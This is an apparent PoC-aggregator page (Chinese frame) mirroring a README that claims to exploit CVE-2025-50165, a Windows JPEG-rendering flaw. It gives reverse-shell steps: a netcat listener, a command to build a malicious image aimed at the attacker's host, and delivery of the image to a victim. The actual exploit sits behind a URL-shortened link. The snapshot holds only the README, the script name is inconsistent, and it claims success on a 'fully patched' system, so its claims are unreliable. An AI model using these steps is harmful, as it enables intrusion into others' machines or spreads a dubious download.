关联漏洞
标题:Microsoft Graphics Component 安全漏洞 (CVE-2025-50165)Description:Microsoft Graphics Component是美国微软(Microsoft)公司的图形驱动组件。 Microsoft Graphics Component存在安全漏洞。攻击者利用该漏洞可以执行代码。以下产品和版本受到影响:Windows Server 2025 (Server Core installation),Windows 11 Version 24H2 for ARM64-based Systems,Windows 11 Version 24H2 for x64-based Syste
介绍
## Proof-of-Concept exploit for the Untrusted Pointer Dereference vulnerability in Windows Graphics Component (CVE-2025-50165).
### **Disclaimer**
This tool is intended for security research and educational purposes only. Any use of this code for malicious activities is strictly prohibited. The author is not responsible for any misuse or damage caused by this program. Use at your own risk.
### **Technical Analysis**
The vulnerability exists within the Windows Graphics Component, specifically in the parsing of specially crafted image files. This exploit targets the JPEG decoding process. By embedding a malformed metadata segment within a JPEG file, an attacker can trigger an untrusted pointer dereference (CWE-822).
The core of the exploit involves crafting a JPEG file that, when rendered, causes the codec to read from a controlled memory address and execute its contents. This is achieved through heap spraying, where the payload is placed into a predictable memory location. The malformed segment then points the instruction pointer to our shellcode, resulting in remote code execution on the target system without any user interaction. The attack vector is viable through web browsers, email clients, and any application that utilizes the underlying Windows API for rendering JPEG images.
### **Usage**
The exploit is generated using a Python script. It creates a malicious `.jpg` file that will trigger the vulnerability.
1. **Set up a listener** to receive the reverse shell. Netcat is a simple option:
```bash
nc -lvnp 4444
```
2. **Generate the exploit image:**
Run the `generate_payload.py` script, providing your listener's IP address and port.
```bash
python3 generatepayload.py --lhost <your_ip> --lport 4444 --output exploit.jpg
```
3. **Deliver the payload.**
Transfer the `exploit.jpg` file to the victim machine. The vulnerability will be triggered as soon as the file is processed for display (e.g., viewing it in a folder with thumbnails enabled, opening it in an image viewer, or embedding it on a webpage).
4. **Receive the connection.**
Your listener should receive a connection from the victim machine, providing a remote command shell.
### **Demo**
The following demonstration shows the exploit in action. A listener is started on the attacker's machine. The generated `exploit.jpg` file is opened on a fully patched Windows 11 24H2 machine, and a reverse shell is immediately established.
`demo.mp4`
### Exploit
[href](https://tinyurl.com/3cyha48t)
For any inquiries, please email me at: anthonmullins@op.pl
文件快照
[4.0K] /data/pocs/e95de8b0169446fa076308be5d3c0347408e86b0
└── [2.5K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。